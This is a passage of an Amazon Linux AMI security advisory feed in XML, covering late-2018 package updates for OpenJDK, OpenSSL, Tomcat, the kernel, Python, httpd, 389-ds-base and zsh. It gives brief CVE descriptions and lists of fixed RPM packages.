CVE-2018-3136 OpenJDK: Incorrect handling of unsigned attributes in signed Jar manifests (Security, 8194534)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3136" title="" id="CVE-2018-3136" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3139" title="" id="CVE-2018-3139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3149" title="" id="CVE-2018-3149" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3169" title="" id="CVE-2018-3169" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3180" title="" id="CVE-2018-3180" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3183" title="" id="CVE-2018-3183" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3214" title="" id="CVE-2018-3214" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-demo" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.191.b12-0.42.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.191.b12-0.42.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.191.b12-0.42.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.191.b12-0.42.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" 
arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.191.b12-0.42.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.191.b12-0.42.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.191.b12-0.42.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.191.b12-0.42.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.191.b12-0.42.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.191.b12-0.42.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.191.b12-0.42.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.191.b12-0.42.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.191.b12-0.42.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.191.b12-0.42.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1098</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1098: medium priority package update for openssl</title><issued date="2018-10-30 20:50:00" /><updated date="2018-11-01 23:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-0732:
During key agreement in a TLS handshake using a DH(E) based ciphersuite a malicious server can send a very large prime value to the client. This will cause the client to spend an unreasonably long period of time generating a key for this prime resulting in a hang until the client has finished. This could be exploited in a Denial Of Service attack. Fixed in OpenSSL 1.1.0i-dev (Affected 1.1.0-1.1.0h). Fixed in OpenSSL 1.0.2p-dev (Affected 1.0.2-1.0.2o).
1591100:
CVE-2018-0732 openssl: Malicious server can send large prime to client during DH(E) TLS handshake causing the client to hang
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0732" title="" id="CVE-2018-0732" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-perl" version="1.0.2k" release="13.111.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-13.111.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="13.111.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-13.111.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="13.111.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-13.111.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="13.111.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-13.111.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="13.111.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-13.111.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="13.111.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-13.111.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="13.111.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-13.111.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="13.111.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-13.111.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="13.111.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-13.111.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="13.111.amzn1" epoch="1" 
arch="i686"><filename>Packages/openssl-static-1.0.2k-13.111.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1099</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1099: medium priority package update for tomcat7</title><issued date="2018-11-05 19:35:00" /><updated date="2018-11-08 00:58:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-11784:
When the default servlet in Apache Tomcat versions 9.0.0.M1 to 9.0.11, 8.5.0 to 8.5.33 and 7.0.23 to 7.0.90 returned a redirect to a directory (e.g. redirecting to &#039;/foo/&#039; when the user requested &#039;/foo&#039;) a specially crafted URL could be used to cause the redirect to be generated to any URI of the attacker&#039;s choice.
1636512:
CVE-2018-11784 tomcat: Open redirect in default servlet
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11784" title="" id="CVE-2018-11784" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7" version="7.0.91" release="1.34.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.91-1.34.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.91" release="1.34.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.91-1.34.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.91" release="1.34.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.91-1.34.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.91" release="1.34.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.91-1.34.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.91" release="1.34.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.91-1.34.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.91" release="1.34.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.91-1.34.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.91" release="1.34.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.91-1.34.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.91" release="1.34.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.91-1.34.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.91" release="1.34.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.91-1.34.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.91" release="1.34.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.91-1.34.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1100</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1100: important priority package update for kernel</title><issued date="2018-11-05 19:47:00" /><updated date="2018-11-08 00:59:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-18021:
A vulnerability was discovered in the Linux kernel that allows an attacker to escalate privileges on a 64-bit ARM architecture. A local attacker with permission to create KVM-based virtual machines can both panic the hypervisor by triggering an illegal exception return (resulting in a DoS) and redirect execution elsewhere within the hypervisor with full register control, instead of causing a return to the guest.
1635475:
CVE-2018-18021 kernel: Privilege escalation on arm64 via KVM hypervisor
CVE-2018-17972:
An issue was discovered in the proc_pid_stack function in fs/proc/base.c in the Linux kernel. An attacker with a local account can trick the stack unwinder code to leak stack contents to userspace. The fix allows only root to inspect the kernel stack of an arbitrary task.
1636349:
CVE-2018-17972 kernel: Unprivileged users able to inspect kernel stacks of arbitrary tasks
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17972" title="" id="CVE-2018-17972" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18021" title="" id="CVE-2018-18021" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-devel" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package 
name="kernel-debuginfo" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.77-69.57.amzn1.i686.rpm</filename></package></collection></pkglist></update><update 
status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1101</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1101: medium priority package update for python35</title><issued date="2018-11-05 21:47:00" /><updated date="2018-11-08 01:01:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-14647:
Python&#039;s elementtree C accelerator failed to initialise Expat&#039;s hash salt during initialization. This could make it easy to conduct denial of service attacks against Expat by constructing an XML document that would cause pathological hash collisions in Expat&#039;s internal data structures, consuming large amounts of CPU and RAM.
1631822:
CVE-2018-14647 python: Missing salt initialization in _elementtree.c module
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14647" title="" id="CVE-2018-14647" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python35-debuginfo" version="3.5.6" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-debuginfo-3.5.6-1.13.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.6" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-tools-3.5.6-1.13.amzn1.x86_64.rpm</filename></package><package name="python35" version="3.5.6" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-3.5.6-1.13.amzn1.x86_64.rpm</filename></package><package name="python35-devel" version="3.5.6" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-devel-3.5.6-1.13.amzn1.x86_64.rpm</filename></package><package name="python35-test" version="3.5.6" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-test-3.5.6-1.13.amzn1.x86_64.rpm</filename></package><package name="python35-libs" version="3.5.6" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-libs-3.5.6-1.13.amzn1.x86_64.rpm</filename></package><package name="python35-libs" version="3.5.6" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/python35-libs-3.5.6-1.13.amzn1.i686.rpm</filename></package><package name="python35-test" version="3.5.6" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/python35-test-3.5.6-1.13.amzn1.i686.rpm</filename></package><package name="python35-debuginfo" version="3.5.6" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/python35-debuginfo-3.5.6-1.13.amzn1.i686.rpm</filename></package><package name="python35" version="3.5.6" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/python35-3.5.6-1.13.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.6" 
release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/python35-devel-3.5.6-1.13.amzn1.i686.rpm</filename></package><package name="python35-tools" version="3.5.6" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/python35-tools-3.5.6-1.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1102</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1102: medium priority package update for openssl</title><issued date="2018-12-05 23:20:00" /><updated date="2018-12-07 00:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-0739:
Constructed ASN.1 types with a recursive definition (such as can be found in PKCS7) could eventually exceed the stack given malicious input with excessive recursion. This could result in a Denial Of Service attack. There are no such structures used within SSL/TLS that come from untrusted sources so this is considered safe. Fixed in OpenSSL 1.1.0h (Affected 1.1.0-1.1.0g). Fixed in OpenSSL 1.0.2o (Affected 1.0.2b-1.0.2n).
1561266:
CVE-2018-0739 openssl: Handling of crafted recursive ASN.1 structures can cause a stack overflow and resulting denial of service
CVE-2018-0495:
Libgcrypt before 1.7.10 and 1.8.x before 1.8.3 allows a memory-cache side-channel attack on ECDSA signatures that can be mitigated through the use of blinding during the signing process in the _gcry_ecc_ecdsa_sign function in cipher/ecc-ecdsa.c, aka the Return Of the Hidden Number Problem or ROHNP. To discover an ECDSA key, the attacker needs access to either the local machine or a different virtual machine on the same physical host.
1591163:
CVE-2018-0495 openssl: ROHNP - Key Extraction Side Channel in Multiple Crypto Libraries
CVE-2017-3735:
While parsing an IPAddressFamily extension in an X.509 certificate, it is possible to do a one-byte overread. This would result in an incorrect text display of the certificate. This bug has been present since 2006 and is present in all versions of OpenSSL before 1.0.2m and 1.1.0g.
1486144:
CVE-2017-3735 openssl: Malformed X.509 IPAddressFamily could cause OOB read
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3735" title="" id="CVE-2017-3735" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0495" title="" id="CVE-2018-0495" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0739" title="" id="CVE-2018-0739" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-perl" version="1.0.2k" release="16.146.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.146.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.146.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.146.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.146.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.146.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.146.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.146.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.146.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.146.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.146.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-16.146.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.146.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-16.146.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.146.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.146.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.146.amzn1" epoch="1" 
arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.146.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.146.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.146.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1104</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1104: medium priority package update for httpd24</title><issued date="2018-12-13 17:29:00" /><updated date="2018-12-14 01:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-11763:
In Apache HTTP Server 2.4.17 to 2.4.34, by sending continuous, large SETTINGS frames a client can occupy a connection, server thread and CPU time without any connection timeout coming to effect. This affects only HTTP/2 connections. A possible mitigation is to not enable the h2 protocol.
1633399:
CVE-2018-11763 httpd: DoS for HTTP/2 connections by continuous SETTINGS frames
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11763" title="" id="CVE-2018-11763" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd24-tools" version="2.4.37" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.37-1.83.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.37" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.37-1.83.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.37" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.37-1.83.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.37" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.37-1.83.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.37" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.37-1.83.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.37" release="1.83.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.37-1.83.amzn1.noarch.rpm</filename></package><package name="mod24_ssl" version="2.4.37" release="1.83.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.37-1.83.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.37" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.37-1.83.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.37" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.37-1.83.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.37" release="1.83.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.37-1.83.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" 
version="2.4.37" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.37-1.83.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.37" release="1.83.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.37-1.83.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.37" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.37-1.83.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.37" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.37-1.83.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.37" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.37-1.83.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.37" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.37-1.83.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.37" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.37-1.83.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.37" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.37-1.83.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.37" release="1.83.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.37-1.83.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1106</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1106: medium priority package update for 389-ds-base</title><issued date="2018-12-06 00:18:00" /><updated date="2018-12-07 00:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-14648:
It was found that a specially crafted search query could lead to excessive CPU consumption in the do_search() function. An unauthenticated attacker could use this flaw to provoke a denial of service.
1630668:
CVE-2018-14648 389-ds-base: Mishandled search requests in servers/slapd/search.c:do_search() allows for denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14648" title="" id="CVE-2018-14648" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-debuginfo" version="1.3.8.4" release="18.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.8.4-18.60.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.8.4" release="18.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.8.4-18.60.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.8.4" release="18.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.8.4-18.60.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.8.4" release="18.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.8.4-18.60.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.8.4" release="18.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-snmp-1.3.8.4-18.60.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.8.4" release="18.60.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-snmp-1.3.8.4-18.60.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.8.4" release="18.60.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.8.4-18.60.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.8.4" release="18.60.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.8.4-18.60.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.8.4" release="18.60.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.8.4-18.60.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.8.4" release="18.60.amzn1" epoch="0" 
arch="i686"><filename>Packages/389-ds-base-devel-1.3.8.4-18.60.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1107</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1107: medium priority package update for zsh</title><issued date="2018-12-06 00:20:00" /><updated date="2018-12-07 00:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-7549:
In params.c in zsh through 5.4.2, there is a crash during a copy of an empty hash table, as demonstrated by typeset -p.
A NULL pointer dereference flaw was found in the code responsible for saving hashtables of the zsh package. An attacker could use this flaw to cause a denial of service by crashing the user shell.
1549858:
CVE-2018-7549 zsh: crash on copying empty hash table
CVE-2018-1100:
A buffer overflow flaw was found in the zsh shell check path functionality. A local, unprivileged user can create a specially crafted message file, which, if used to set a custom &quot;you have new mail&quot; message, leads to code execution in the context of the user who receives the message. If the user affected is privileged, this leads to privilege escalation.
1563395:
CVE-2018-1100 zsh: buffer overflow in utils.c:checkmailpath() can lead to local arbitrary code execution
CVE-2018-1083:
A buffer overflow flaw was found in the zsh shell auto-complete functionality. A local, unprivileged user can create a specially crafted directory path which leads to code execution in the context of the user who tries to use auto-complete to traverse the aforementioned path. If the user affected is privileged, this leads to privilege escalation.
1557382:
CVE-2018-1083 zsh: Stack-based buffer overflow in gen_matches_files() at compctl.c
CVE-2018-1071:
